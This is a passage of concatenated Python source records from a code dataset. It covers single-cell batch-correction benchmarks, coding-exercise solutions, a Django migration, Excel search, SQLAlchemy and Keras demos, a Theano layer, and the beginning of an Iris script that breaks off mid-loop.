  if os.path.exists(\"./result/cell_lines_result.h5ad\"):\n        adata = None\n    else:\n        n_obs = X.shape[0]\n        adata = AnnData(X = csr_matrix((n_obs, 2)), obs = df_metadata)\n        adata.obsm['X_pca'] = X\n\n        pg.neighbors(adata, rep = 'pca')\n        pg.umap(adata)\n\n    umap_list = [f for f in os.listdir(\"./plots\") if re.match(\"cell_lines.*.pdf\", f)]\n    if len(umap_list) < 4:\n        plot_umap(adata, Z_torch, Z_py, Z_R, prefix = \"cell_lines\", batch_key = \"dataset\")\n\n    if os.path.exists(\"./result/cell_lines_result.h5ad\"):\n       adata = pg.read_input(\"./result/cell_lines_result.h5ad\", h5ad_mode = 'r')\n\n       stat, pvalue, ac_rate = pg.calc_kBET(adata, attr = 'dataset', rep = 'harmony')\n       print(\"kBET for Harmony: statistic = {stat}, p-value = {pval}, ac rate = {ac_rate}\".format(stat = stat, pval = pvalue, ac_rate = ac_rate))\n\n       stat, pvalue, ac_rate = pg.calc_kBET(adata, attr = 'dataset', rep = 'py')\n       print(\"kBET for harmonypy: statistic = {stat}, p-value = {pval}, ac rate = {ac_rate}\".format(stat = stat, pval = pvalue, ac_rate = ac_rate))\n\n       stat, pvalue, ac_rate = pg.calc_kBET(adata, attr = 'dataset', rep = 'torch')\n       print(\"kBET for harmony-pytorch: statistic = {stat}, p-value = {pval}, ac rate = {ac_rate}\".format(stat = stat, pval = pvalue, ac_rate = ac_rate))\n\n\ndef test_pbmc():\n    print(\"Testing on 10x pbmc dataset...\")\n\n    z_files = [f for f in os.listdir(\"./result\") if re.match(\"pbmc.*_z.(txt|npy)\", f)]\n    if len(z_files) < 3 or not os.path.exists(\"./result/pbmc_result.h5ad\"):\n        adata = pg.read_input(\"./data/10x_pbmc/original_data.h5ad\")\n\n    if os.path.exists(\"./result/pbmc_torch_z.npy\"):\n        Z_torch = np.load(\"./result/pbmc_torch_z.npy\")\n        print(\"Precalculated embedding by harmony-pytorch is loaded.\")\n    else:\n        start_torch = time.time()\n        Z_torch = harmonize(adata.obsm['X_pca'], adata.obs, batch_key = 'Channel')\n        end_torch = time.time()\n\n        print(\"Time spent for harmony-pytorch = {:.2f}s.\".format(end_torch - start_torch))\n        np.save(\"./result/pbmc_torch_z.npy\", Z_torch)\n\n    if os.path.exists(\"./result/pbmc_py_z.npy\"):\n        Z_py = np.load(\"./result/pbmc_py_z.npy\")\n        print(\"Precalculated embedding by harmonypy is loaded.\")\n    else:\n        start_py = time.time()\n        ho = run_harmony(adata.obsm['X_pca'], adata.obs, ['Channel'])\n        end_py = time.time()\n\n        print(ho.objective_harmony)\n        print(\"Time spent for harmonypy = {:.2f}s.\".format(end_py - start_py))\n\n        Z_py = np.transpose(ho.Z_corr)\n        np.save(\"./result/pbmc_py_z.npy\", Z_py)\n\n    Z_R = np.loadtxt(\"./result/pbmc_harmony_z.txt\")\n\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"pbmc\", norm = 'r')\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"pbmc\", norm = 'L2')\n\n    if os.path.exists(\"./result/pbmc_result.h5ad\"):\n        adata = None\n\n    umap_list = [f for f in os.listdir(\"./plots\") if re.match(\"pbmc.*.pdf\", f)]\n    if len(umap_list) < 4:\n        plot_umap(adata, Z_torch, Z_py, Z_R, prefix = \"pbmc\", batch_key = \"Channel\")\n\n\ndef test_mantonbm():\n    print(\"Testing on MantonBM dataset...\")\n\n    z_files = [f for f in os.listdir(\"./result\") if re.match(\"MantonBM.*_z.(txt|npy)\", f)]\n    if len(z_files) < 3 or not os.path.exists(\"./result/MantonBM_result.h5ad\"):\n        adata = pg.read_input(\"./data/MantonBM/original_data.h5ad\")\n        adata.obs['Individual'] = pd.Categorical(adata.obs['Channel'].apply(lambda s: s.split('_')[0][-1]))\n\n    if os.path.exists(\"./result/MantonBM_torch_z.npy\"):\n        Z_torch = np.load(\"./result/MantonBM_torch_z.npy\")\n        print(\"Precalculated embedding by harmony-pytorch is loaded.\")\n    else:\n        start_torch = time.time()\n        Z_torch = harmonize(adata.obsm['X_pca'], adata.obs, batch_key = 'Channel')\n        end_torch = time.time()\n\n        print(\"Time spent for harmony-pytorch = {:.2f}s.\".format(end_torch - start_torch))\n        np.save(\"./result/MantonBM_torch_z.npy\", Z_torch)\n\n    if os.path.exists(\"./result/MantonBM_py_z.npy\"):\n        Z_py = np.load(\"./result/MantonBM_py_z.npy\")\n        print(\"Precalculated embedding by harmonypy is loaded.\")\n    else:\n        start_py = time.time()\n        ho = run_harmony(adata.obsm['X_pca'], adata.obs, ['Channel'])\n        end_py = time.time()\n\n        print(\"Time spent for harmonypy = {:.2f}s.\".format(end_py - start_py))\n\n        Z_py = np.transpose(ho.Z_corr)\n        np.save(\"./result/MantonBM_py_z.npy\", Z_py)\n\n\n    Z_R = np.loadtxt(\"./result/MantonBM_harmony_z.txt\")\n\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"MantonBM\", norm = 'r')\n    check_metric(Z_torch, Z_py, Z_R, prefix = \"MantonBM\", norm = 'L2')\n\n    if os.path.exists(\"./result/MantonBM_result.h5ad\"):\n        adata = None\n\n    umap_list = [f for f in os.listdir(\"./plots\") if re.match(\"MantonBM.*.pdf\", f)]\n    if len(umap_list) < 4:\n        plot_umap(adata, Z_torch, Z_py, Z_R, prefix = \"MantonBM\", batch_key = \"Individual\")\n\n\ndef gen_plot(norm):\n\n    # Cell Lines\n    metric_celllines_torch = np.loadtxt(\"./result/cell_lines_{}_torch.txt\".format(norm))\n    metric_celllines_py = np.loadtxt(\"./result/cell_lines_{}_py.txt\".format(norm))\n\n    df1 = pd.DataFrame({'dataset' : np.repeat(['Cell Lines'], metric_celllines_torch.size + metric_celllines_py.size),\n                        'package' : np.concatenate((np.repeat(['Torch'], metric_celllines_torch.size),\n                                                   np.repeat(['Py'], metric_celllines_py.size)), axis = 0),\n                        'metric' : np.concatenate((metric_celllines_torch, metric_celllines_py), axis = 0)})\n\n    # PBMC\n    metric_pbmc_torch = np.loadtxt(\"./result/pbmc_{}_torch.txt\".format(norm))\n    metric_pbmc_py = np.loadtxt(\"./result/pbmc_{}_py.txt\".format(norm))\n\n    df2 = pd.DataFrame({'dataset' : np.repeat(['10x PBMC'], metric_pbmc_torch.size + metric_pbmc_py.size),\n                        'package' : np.concatenate((np.repeat(['Torch'], metric_pbmc_torch.size),\n                                                    np.repeat(['Py'], metric_pbmc_py.size)), axis = 0),\n                        'metric' : np.concatenate((metric_pbmc_torch, metric_pbmc_py), axis = 0)})\n\n    # MantonBM\n    metric_mantonbm_torch = np.loadtxt(\"./result/MantonBM_{}_torch.txt\".format(norm))\n    metric_mantonbm_py = np.loadtxt(\"./result/MantonBM_{}_py.txt\".format(norm))\n\n    df3 = pd.DataFrame({'dataset' : np.repeat(['Bone Marrow'], metric_mantonbm_torch.size + metric_mantonbm_py.size),\n                        'package' : np.concatenate((np.repeat(['Torch'], metric_mantonbm_torch.size),\n                                                    np.repeat(['Py'], metric_mantonbm_py.size)), axis = 0),\n                        'metric' : np.concatenate((metric_mantonbm_torch, metric_mantonbm_py), axis = 0)})\n\n    df = pd.concat([df1, df2, df3])\n\n    # Plot\n    ax = sns.violinplot(x = \"dataset\", y = \"metric\", hue = \"package\", data = df, palette = \"muted\", split = True, cut = 0)\n    ax.set_title(\"{} between Harmonypy and Harmony-pytorch Integration\".format(metric_dict[norm]))\n    ax.set(xlabel = 'Dataset', ylabel = \"{} on PCs\".format(metric_dict[norm]))\n    if norm == 'r':\n        ax.set(ylim = (0.98, 1.001))\n    else:\n        ax.set(ylim = (0, 0.1))\n    figure = ax.get_figure()\n    legend_loc = 'lower right' if norm == 'r' else 'upper right'\n    figure.get_axes()[0].legend(title = \"Package\", loc = legend_loc)\n    figure.savefig(\"./plots/{}_stats.png\".format(norm), dpi = 400)\n    plt.close()\n\n\nif __name__ == '__main__':\n    dataset = sys.argv[1]\n\n    assert dataset in [\"cell_lines\", \"pbmc\", \"MantonBM\", \"plot\"]\n\n    if not os.path.exists(\"./result\"):\n        if os.system(\"mkdir ./result\"):\n            sys.exit(1)\n\n    if not os.path.exists(\"./plots\"):\n        if os.system(\"mkdir ./plots\"):\n            sys.exit(1)\n\n    if dataset == 'cell_lines':\n        test_cell_lines()\n    elif dataset == 'pbmc':\n        test_pbmc()\n    elif dataset == 'MantonBM':\n        test_mantonbm()\n    else:\n        gen_plot('r')\n        gen_plot('L2')\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"352766169","text":"T = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n    # ///////////////////////////////////////////////////////////////////////////////////\n    map_list = [[0]*10 for _ in range(10)]\n    N = int(input())\n    for draw in range(N):\n        r1, c1, r2, c2, color = map(int,input().split())\n        for i in range(r1, r2+1):\n            for j in range(c1, c2+1):\n                map_list[i][j] += color\n    purple = 0\n    for row in map_list:\n        if 3 in row:\n            purple += row.count(3)\n\n    print('#{} {}'.format(test_case, purple))","sub_path":"20190808/4836.py","file_name":"4836.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"571605265","text":"arrival = [17 , 978, 409, 229, 934, 299, 982, 636, 14 , 866, 815, 64 , 537, 426, 670, 116, 95 , 630]\nduration = [17 , 502, 518, 196, 106, 405, 452, 299, 189, 124, 506, 883, 753, 567, 717, 338, 439, 145]\n\n\n# arrival = [5, 1, 1, 1, 1, 4]\n# duration = [5, 10, 3, 6, 4, 2]\ndef maxEvents(arrival, duration):\n    # Write your code here\n\n    sortedCompanies = zip(arrival, duration)\n    sortedCompanies.sort(key=lambda x: x[0])\n    print(sortedCompanies)\n    \n    eventCounter = 0\n    departure = 0\n    currentPresenterArrivalTime = 0\n    for i in range(len(arrival)):    \n        # print(sortedCompanies[i], eventCounter, departure, currentPresenterArrivalTime, sortedCompanies[i][0], sortedCompanies[i][1])\n        currDeparture = sortedCompanies[i][0] + sortedCompanies[i][1]\n        # print('before if check', sortedCompanies[i][0], currentPresenterArrivalTime, departure)\n        if sortedCompanies[i][0] >= departure:\n            currentPresenterArrivalTime = sortedCompanies[i][0]\n            departure = currDeparture\n            eventCounter += 1\n        elif currDeparture < departure:\n            print('hit here')\n            departure = min(departure, currDeparture)\n        \n    return eventCounter\n\nprint(maxEvents(arrival, duration))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"105393858","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('business_unit', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Area',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('nome', models.CharField(max_length=60, null=b'true', verbose_name=b'Nome', blank=b'true')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n            ],\n            options={\n                'verbose_name': '\\xc1rea',\n                'verbose_name_plural': '\\xc1reas',\n            },\n        ),\n        migrations.CreateModel(\n            name='Cargo',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('cargo', models.CharField(max_length=60, null=b'true', verbose_name=b'Cargo', blank=b'true')),\n            ],\n            options={\n                'ordering': ('cargo',),\n                'verbose_name': 'Cargo',\n                'verbose_name_plural': 'Cargos',\n            },\n        ),\n        migrations.CreateModel(\n            name='Funcionario',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('ativo', models.BooleanField(default=1, verbose_name=b'Ativo')),\n                ('matricula', models.IntegerField(verbose_name=b'Matricula')),\n                ('nome', models.CharField(max_length=255, verbose_name=b'Nome')),\n                ('data_contratacao', models.DateField(default=datetime.date.today, verbose_name=b'Data Contrata\\xc3\\xa7\\xc3\\xa3o')),\n                ('data_demissao', models.DateField(null=b'true', verbose_name=b'Data Demiss\\xc3\\xa3o', blank=b'true')),\n                ('data_nascimento', models.DateField(null=b'true', verbose_name=b'Data de Nascimento', blank=b'true')),\n                ('estado_civil', models.IntegerField(blank=b'true', null=b'true', verbose_name=b'Estado Civil', choices=[(1, b'Solteiro(a)'), (2, b'Casado(a)'), (3, b'Divorciado(a)'), (4, b'Vi\\xc3\\xbavo(a)')])),\n                ('sexo', models.IntegerField(blank=b'true', null=b'true', verbose_name=b'Sexo', choices=[(1, b'Masculino'), (2, b'Feminino'), (3, b'Outro')])),\n                ('endereco', models.CharField(max_length=255, null=b'true', verbose_name=b'Endere\\xc3\\xa7o', blank=b'true')),\n                ('bairro', models.CharField(max_length=255, null=b'true', verbose_name=b'Bairro', blank=b'true')),\n                ('cidade', models.CharField(max_length=255, null=b'true', verbose_name=b'Cidade', blank=b'true')),\n                ('cep', models.CharField(max_length=10, null=b'true', verbose_name=b'CEP', blank=b'true')),\n                ('telefone', models.CharField(max_length=30, null=b'true', verbose_name=b'Fone', blank=b'true')),\n                ('celular', models.CharField(max_length=30, null=b'true', verbose_name=b'Celular', blank=b'true')),\n                ('telefone2', models.CharField(max_length=30, null=b'true', verbose_name=b'Fone Recado', blank=b'true')),\n                ('email', models.EmailField(max_length=254, null=b'true', verbose_name=b'E-mail', blank=b'true')),\n                ('tipo_sanguineo', models.CharField(max_length=5, null=b'true', verbose_name=b'Tipo Sanguineo', blank=b'true')),\n                ('team', models.CharField(max_length=30, null=b'true', verbose_name=b'Equipe', blank=b'true')),\n                ('turno', models.CharField(max_length=30, null=b'true', verbose_name=b'Turno', blank=b'true')),\n                ('obs', models.TextField(null=b'true', verbose_name=b'Obs', blank=b'true')),\n                ('area', models.ForeignKey(blank=b'true', to='funcionario.Area', null=b'true')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n                ('cargo', models.ForeignKey(blank=b'true', to='funcionario.Cargo', null=b'true')),\n            ],\n            options={\n                'ordering': ('nome',),\n                'verbose_name': 'Funcion\\xe1rio',\n                'verbose_name_plural': 'Funcion\\xe1rios',\n            },\n        ),\n        migrations.CreateModel(\n            name='Permissao',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('definitiva', models.BooleanField(default=True, verbose_name=b'Definitiva')),\n                ('validade', models.DateField(default=datetime.date.today, verbose_name=b'Data de Validade')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n                ('funcionario', models.ForeignKey(blank=b'true', to='funcionario.Funcionario', null=b'true')),\n            ],\n            options={\n                'verbose_name': 'Permiss\\xe3o',\n                'verbose_name_plural': 'Permiss\\xf5es',\n            },\n        ),\n        migrations.CreateModel(\n            name='Permissao_Especial',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('nome', models.CharField(max_length=60, null=b'true', verbose_name=b'Nome', blank=b'true')),\n                ('business_unit', models.ForeignKey(blank=b'true', to='business_unit.BusinessUnit', null=b'true')),\n            ],\n            options={\n                'verbose_name': 'Permiss\\xe3o Especial',\n                'verbose_name_plural': 'Permiss\\xf5es Especiais',\n            },\n        ),\n        migrations.AddField(\n            model_name='permissao',\n            name='permissao_especial',\n            field=models.ForeignKey(blank=b'true', to='funcionario.Permissao_Especial', null=b'true'),\n        ),\n        migrations.AlterUniqueTogether(\n            name='funcionario',\n            unique_together=set([('matricula', 'business_unit')]),\n        ),\n    ]\n","sub_path":"funcionario/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"540251075","text":"import os\r\nimport re\r\n\r\nimport xlrd\r\nfrom xlsxwriter.utility import xl_rowcol_to_cell\r\n\r\n\r\nclass ExcelFinder:\r\n    def __init__(self, dir_names):\r\n        self.excel_files = self.find_excel_files(dir_names)\r\n\r\n    def find_excel_files(self, dir_names):\r\n        excel_files = []\r\n        for dir_name in dir_names:\r\n            files = os.listdir(dir_name)\r\n            for file in files:\r\n                full_name = os.path.join(dir_name, file)\r\n                ext = os.path.splitext(full_name)[1]\r\n                if ext in ['.xls', '.xlsx', '.xlsm'] \\\r\n                        and not re.search(r\"^\\~\\$\", file):\r\n                    excel_files.append(full_name)\r\n\r\n        return excel_files\r\n\r\n    def text_search(self, search_text):\r\n        find_results = []\r\n        for excel_file in self.excel_files:\r\n            workbook = xlrd.open_workbook(excel_file)\r\n            sheets = workbook.sheets()\r\n\r\n            for sheet in sheets:\r\n                for row in range(sheet.nrows):\r\n                    for col in range(sheet.ncols):\r\n                        cell = sheet.cell(row, col)\r\n                        if search_text in cell.value:\r\n                            cell_name = xl_rowcol_to_cell(row, col)\r\n                            find_results.append((excel_file, sheet.name, cell.value, cell_name))\r\n\r\n        return find_results\r\n\r\n\r\nif __name__ == '__main__':\r\n    excel_finder = ExcelFinder([r\"D:\\excel_test\", r\"D:\\excel_test\\sub\"])\r\n    find_results = excel_finder.text_search(\"02018878-0005\")\r\n\r\n    print(find_results)","sub_path":"excel_finder/excel_finder.py","file_name":"excel_finder.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"88913755","text":"import datetime as dt\nimport devfx.databases.sqlalchemy as sadb\n\nBaseDatabaseEntity = sadb.orm.create_base_database_entity_type()\n\n\"\"\" Schema\n\"\"\"\nclass Entity1(BaseDatabaseEntity):\n    __tablename__ = \"entity1\"\n\n    id = sadb.orm.Column_as__Integer_id()\n    entity2s = sadb.orm.Relationship_one_to_many(\"Entity2\")\n\n    created_on = sadb.orm.Column_as__created_on()\n    updated_on = sadb.orm.Column_as__updated_on()\n\n    def __repr__(self):\n        return \"Entity1(id={self.id}, \"\\\n                    \"created_on={self.created_on}, \"\\\n                    \"created_on={self.updated_on})\".format(self=self)\n\n\nclass Entity2(BaseDatabaseEntity):\n    __tablename__ = \"entity2\"\n    id = sadb.orm.Column_as__Integer_id()\n    entity1_id = sadb.orm.Column_as_ForeignKey(\"entity1.id\")\n    entity1 = sadb.orm.Relationship_many_to_one(\"Entity1\")\n\n    BigInteger = sadb.orm.Column_as_BigInteger()\n    Integer = sadb.orm.Column_as_Integer()\n    SmallInteger = sadb.orm.Column_as_SmallInteger()\n    FixedPointNumber = sadb.orm.Column_as_FixedPointNumber()\n    FloatingPointNumber = sadb.orm.Column_as_FloatingPointNumber()\n\n    String = sadb.orm.Column_as_String()\n    Text = sadb.orm.Column_as_Text()\n\n    Boolean = sadb.orm.Column_as_Boolean()\n\n    DateTime = sadb.orm.Column_as_DateTime()\n    Date = sadb.orm.Column_as_Date()\n    Time = sadb.orm.Column_as_Time()\n    Timedelta = sadb.orm.Column_as_Timedelta()\n\n    created_on = sadb.orm.Column_as__created_on()\n    updated_on = sadb.orm.Column_as__updated_on()\n\n    def __repr__(self):\n        return \"Entity2(id={self.id}, \"\\\n                \"id_entity1={self.entity1_id}, \" \\\n                \"BigInteger={self.BigInteger}, \" \\\n                \"Integer={self.Integer}, \"\\\n                \"SmallInteger={self.SmallInteger}, \"\\\n                \"FixedPointNumber={self.FixedPointNumber}, \"\\\n                \"FloatingPointNumber={self.FloatingPointNumber}, \"\\\n                \"String='{self.String}', \" \\\n                \"Text='{self.Text}', \" \\\n                \"Boolean={self.Boolean}, \"\\\n                \"DateTime={self.DateTime}, \"\\\n                \"Date={self.Date}, \"\\\n                \"Time={self.Time}, \"\\\n                \"Timedelta={self.Timedelta}, \"\\\n                \"created_on={self.created_on}, \"\\\n                \"created_on={self.updated_on})\".format(self=self)\n\n\n\"\"\" Connection string\n\"\"\"\nconnection_string = 'sqlite:///devfx_samples/database/sqlalchemy/orm/didactic1.db'\n\n\"\"\" Deploy\n\"\"\"\nsadb.orm.deploy_database_metadata(BaseDatabaseEntity, connection_string)\n\n\n\"\"\" Create\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as session:\n    entity11 = Entity1()\n    session.add(entity11)\n    session.flush()\n\n    entity21 = Entity2()\n    entity21.entity1_id = entity11.id\n    entity21.BigInteger = 1\n    entity21.Integer = 1\n    entity21.SmallInteger = 1\n    entity21.FixedPointNumber = 1\n    entity21.FloatingPointNumber = 1.0\n    entity21.String = \"1\"\n    entity21.UnicodeString = \"1\"\n    entity21.Text = \"1\"\n    entity21.UnicodeText = \"1\"\n    entity21.Boolean = True\n    entity21.DateTime = dt.datetime.utcnow()\n    entity21.Date = entity21.DateTime.date()\n    entity21.Time = entity21.DateTime.time()\n    entity21.Timedelta = dt.timedelta(seconds=8)\n    session.add(entity21)\n    session.flush()\n\n    entity22 = Entity2()\n    entity22.entity1_id = entity11.id\n    entity22.BigInteger = 2\n    entity22.Integer = 2\n    entity22.SmallInteger = 2\n    entity22.FixedPointNumber = 2\n    entity22.FloatingPointNumber = 1.0\n    entity22.String = \"2\"\n    entity22.UnicodeString = \"2\"\n    entity22.Text = \"2\"\n    entity22.UnicodeText = \"2\"\n    entity22.Boolean = True\n    entity22.DateTime = dt.datetime.utcnow()\n    entity22.Date = entity21.DateTime.date()\n    entity22.Time = entity21.DateTime.time()\n    entity22.Timedelta = dt.timedelta(seconds=8)\n    session.add(entity22)\n    session.flush()\n\n\"\"\" Query\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as dbsession:\n    entity1_list = dbsession.query(Entity1.id).all()\n    for entity1 in entity1_list:\n        print(entity1)\n\n    entity2_list = dbsession.query(Entity2).all()\n    for entity2 in entity2_list:\n        print(entity2)\n\n\"\"\" Update\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as dbsession:\n    entity2_list = dbsession.query(Entity2).all()\n    for entity2 in entity2_list:\n        entity2.Integer = entity2.Integer+1\n\n\"\"\" Delete\n\"\"\"\n# with sadb.orm.DatabaseSession(database_connection_string) as dbsession:\n#     entity1 = dbsession.query(Entity1).first()\n#     dbsession.delete(entity1)\n\n\n\"\"\" Relationship\n\"\"\"\nwith sadb.orm.DatabaseSession(connection_string) as dbsession:\n    entity1 = dbsession.query(Entity1).first()\n    print(entity1.entity2s)\n    entity2 = dbsession.query(Entity2).first()\n    print(entity2.entity1)","sub_path":"solution/devfx_samples/database/sqlalchemy/orm/didactic1.py","file_name":"didactic1.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"26080026","text":"import os\nimport subprocess\n\ndef svg_to_png(svg_path, dpi=300):\n    \"\"\"Convert svg file to PNG using inkscape.\n    \"\"\"\n    cmd = \"inkscape -e {} --export-area-page -d {} {}\"\n    out = svg_path.replace('.svg', '.png')\n    p = subprocess.call(cmd.format(out, dpi, svg_path), shell=True)\n    return out\n\ndef svg_to_pdf(svg_path, via_png=False):\n    \"\"\"Convert svg file to PDF using ImageMagick.\n    \"\"\"\n    if via_png:\n        in_path = svg_to_png(svg_path)\n    else:\n        in_path = svg_path\n\n    cmd = \"convert {} {}\"\n    fpdf = svg_path.replace('.svg', '.pdf')\n    p = subprocess.call(cmd.format(in_path, fpdf), shell=True)\n\n    if via_png:\n        os.remove(in_path)\n\n    return fpdf\n\ndef docx_to_pdf(docx_path):\n    \"\"\"\n    \"\"\"\n    cmd = \"unoconv {}\"\n    p = subprocess.call(cmd.format(docx_path), shell=True)\n","sub_path":"figtools/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"618487843","text":"from itertools import cycle\n\ndef solution(answers):\n    count = [0,0,0]\n    answer = []\n\n    supo1=[1,2,3,4,5]\n    supo2=[2,1,2,3,2,4,2,5]\n    supo3=[3,3,1,1,2,2,4,4,5,5]\n\n    for one,two,three,num in zip(cycle(supo1),cycle(supo2),cycle(supo3),answers):\n        if one == num:\n            count[0]+=1\n        if two == num:\n            count[1]+=1\n        if three == num:\n            count[2]+=1\n\n    for index,value in enumerate(count):\n        if value == max(count):\n            answer.append(index+1)\n\n    return answer\n\nanswers=[1,3,2,4,2]\n\nprint(solution(answers))","sub_path":"프로그래머스/모의고사 _ 완전탐색.py","file_name":"모의고사 _ 완전탐색.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"206423280","text":"class IconTrainingModel:\n\n    def create_dataset(img_folder):\n        img_data_array=[]\n        class_name=[]\n        for dir1 in os.listdir(img_folder):\n            for file in os.listdir(os.path.join(img_folder, dir1)):\n                #print(\"file\",file)\n                image_path= os.path.join(img_folder, dir1,  file)\n                #print(\"image_path\",image_path)\n                image= imread( image_path)#, cv2.COLOR_BGR2RGB)\n                #if(isempty(image))\n                image=cv2.resize(image,(img_height, img_width),interpolation = cv2.INTER_AREA)\n                image=np.array(image)\n                image = image.astype('float32')\n                image /= 255\n                img_data_array.append(image)\n                class_name.append(dir1)\n        img=np.array(img_data_array)\n        msk=np.array(class_name)\n        return img_data_array, class_name\n\n    def target_val(y_train):\n        target_dict={k: v for v, k in enumerate(np.unique(y_train))}\n        target_dict\n        target_val=  [target_dict[y_train[i]] for i in range(len(y_train))]\n        print(target_val)\n        return target_val\n    \n    def cnn_model(num_classes):\n        model = Sequential([\n        layers.Conv2D(16, 3, padding='same', activation='relu'),\n        layers.MaxPooling2D(),\n        layers.Conv2D(32, 3, padding='same', activation='relu'),\n        layers.MaxPooling2D(),\n        layers.Conv2D(64, 3, padding='same', activation='relu'),\n        layers.MaxPooling2D(),\n        layers.Flatten(),\n        layers.Dense(128, activation='relu'),\n        layers.Dense(num_classes)\n        ])\n        return model\n\n    def train_model(model, x_train, target_val):\n        model.compile(optimizer='adam',loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),metrics=['accuracy'])\n        history = model.fit(x_train,np.array(target_val), batch_size=10, epochs=5, verbose=1)\n        return history\n       \n    \n","sub_path":"IconsTrainingModel.py","file_name":"IconsTrainingModel.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"654188892","text":"import theano\nimport lasagne\nimport theano.tensor as T\nfrom ops.gumbel_softmax import gumbel_softmax\nfrom ops.gradient_switch_op import gradient_switch_op\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams\n\n\nclass GumbelSoftmaxLayer(lasagne.layers.Layer):\n    def __init__(self, incoming, temperature, K, hard=False,**kwargs):\n        super(GumbelSoftmaxLayer, self).__init__(incoming, **kwargs)\n        self.trng = RandomStreams(12345)\n        self.hard = hard\n        self.K = K\n        self.temperature = temperature\n\n    def get_output_for(self, input_, **kwargs):\n        input_reshaped = T.reshape(input_, (-1, 2))\n        log_q_y = T.nnet.logsoftmax(input_reshaped)\n        concept_disc = gumbel_softmax(log_q_y,\n                                      self.trng,\n                                      temperature=self.temperature,\n                                      hard=self.hard)\n        output = T.reshape(concept_disc, (-1, 1, self.K, self.K))\n        return output\n\n    def get_output_shape_for(self, input_shape):\n        return (input_shape[0], 1, self.K, self.K)","sub_path":"theano/gans/BGAN/old/DISC-MNIST-PFAKE/layers/gs_layer.py","file_name":"gs_layer.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"533280125","text":"__author__ = 'Corey'\n\n# s = r\"sss\\nss\"\n# print s\n\n# print 3*\"22\"\n\n# s = ('222'\n# '333')\n# print s\n\n# s='supercalifragilisticexpialidocious'\n# print len(s)\n\n# s = u\"hello\\u002055r\"\n# print s\n# a, b = 0, 1\n# while b < 10:\n#     print b\n#     a, b = b, a+b\n\n\n \n","sub_path":"PythonCode/helloworld/str.py","file_name":"str.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"434005849","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n=========================================================\nThe Iris Dataset\n=========================================================\nThis data sets consists of 3 different types of irises'\n(Setosa, Versicolour, and Virginica) petal and sepal\nlength, stored in a 150x4 numpy.ndarray\n\nThe rows being the samples and the columns being:\nSepal Length, Sepal Width, Petal Length and Petal Width.\n\nThe below plot uses the first two features.\nSee `here `_ for more\ninformation on this dataset.\n\"\"\"\nprint(__doc__)\n\n\n# Code source: Gaël Varoquaux\n# Modified for documentation by Jaques Grobler\n# License: BSD 3 clause\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import datasets\nfrom sklearn.decomposition import PCA\nimport loader\n\n\nx_labels = []\nf = open(\"t_xlabels.txt\",\"r\")\nline = f.read()\nfor label in line.split(\",\"):\n    x_labels.append(label[1:len(label)-1])\n# x_labels = {\"SepalLengthCm\",\"SepalWidthCm\",\"PetalLengthCm\",\"PetalWidthCm\"}\nX, y, type2id = loader.load_data('Iris_t.csv', y_label=\"Species\", x_labels=x_labels)\n\nsummation_X = []\nsummation_Y = []\nfor vector in X:\n    index = 1\n    result = 0\n    for v in vector:\n        if(v>0):\n            result+=(index*v)\n\n    index+=1\n    